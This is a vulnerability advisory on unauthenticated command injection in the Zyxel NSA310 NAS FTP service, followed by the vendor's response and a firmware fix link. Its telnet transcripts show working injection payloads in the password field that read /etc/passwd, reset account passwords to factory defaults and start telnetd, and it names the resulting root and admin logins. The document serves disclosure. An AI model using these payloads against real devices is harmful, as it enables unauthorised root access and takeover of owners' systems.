SSD Advisory – Zyxel Remote Unauthenticated Code Execution (NSA310)

Vulnerability Description
A remote unauthenticated code execution vulnerability in Zyxel NSA310 allows remote attackers to execute arbitrary code as a ‘root’ user. The product is being actively sold by Zyxel – http://www.amazon.com/s/ref=nb_sb_noss?url=search-alias%3Daps&field-keywords=ZyXEL+NSA310 – originally the vendor stated that “NSA310 for reasons being that it has been out End of life for over 2 years” which left every customer buying this product vulnerable to a serious security flaw without having any solution or remediation to it.
UPDATE Zyxel has released a new firmware, that claims to resolved the vulnerabilities listed below, we no longer have access to the hardware so we cannot confirm that it does
https://zyxel.box.com/s/ebm31culmcokm8bf7xymjx1v6z6zezrj

Vulnerable Version
Zyxel NSA310 V4.70(AFK.1)
Since the product has reached end of life its not clear if older are vulnerable as well as the older firmwares are no longer available for download, the version mentioned here is the latest available version.
Command Injection
Due to the way commands are passed inside the system, and lack of proper filtering of user information, an attacker can use the ‘ (single quote) to escape the original command syntax and introduce additional commands to be executed by the code.
Example:

$ telnet 192.168.219.101 21
Trying 192.168.219.101...
Connected to 192.168.219.101.
Escape character is '^]'.
220­­­­­­­­­­ Welcome to Pure­FTPd [TLS] ­­­­­­­­­­
220­ You are user number 1 of 10 allowed.
220 ­Local time is now 22:46. Server port: 21.
220 ­This is a private system ­ No anonymous login
220­ IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
user '
331 User ' OK. Password required
pass ';cat /etc/passwd;
root:x:0:0:root:/root:/bin/sh

As can be seen using
‘;cat /etc/passwd;
It is possible to cause the FTP server to display the content of the passwd file
Reset Password with Command Injection
By leveraging the first attack and another script that is present on the system, /sbin/account.sh it is possible to change the password of users without knowing their previous password:

$ telnet 192.168.219.101 21
Trying 192.168.219.101...
Connected to 192.168.219.101.
Escape character is '^]'.
220­­­­­­­­­­ Welcome to Pure­FTPd [TLS] ­­­­­­­­­­
220 ­You are user number 1 of 10 allowed.
220 ­Local time is now 22:46. Server port: 21.
220 ­This is a private system ­ No anonymous login
220­ IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
user '
331 User ' OK. Password required
pass ';/sbin/account.sh;

Once this is done, the password (even if they were changed) will reset to the factory defaults (admin/1234)
Execute Telnetd with Command Injection

$ telnet 192.168.219.101 21
Trying 192.168.219.101...
Connected to 192.168.219.101.
Escape character is '^]'.
220­­­­­­­­­­ Welcome to Pure­FTPd [TLS] ­­­­­­­­­­
220­ You are user number 1 of 10 allowed.
220 ­Local time is now 22:46. Server port: 21.
220 ­This is a private system ­ No anonymous login
220­ IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
user '
331 User ' OK. Password required
pass ';telnetd;

By doing the above attack a telnet daemon can be started, this daemon will allow access using:

admin / changed_pw
root / changed_pw

Which are the passwords found inside smbpasswd.default file which we can read using previously mentioned vulnerability, and reset the system to use them using method Reset Password with Command Injection.
Vendor response
The vendor’s original response was quite disappointing, especially since the vendor is actively selling this device on Amazon (and elsewhere) so while it reached EoL 2 years ago, you can still buy the product and not even know you won’t be getting any fixes or upgrades:

I have discussed the issue with H.Q., and they will no longer be updating the NSA310 for reasons being that it has been out End of life for over 2 years. They have tested the newer devices for the same vulnerability, and did not find the same issue.

They have since have revised their response to:

H.Q. has released a fix for the NSA 310 issue. I have attached the link to the .bin file firmware.
Here is the link to the firmware:
https://zyxel.box.com/s/ebm31culmcokm8bf7xymjx1v6z6zezrj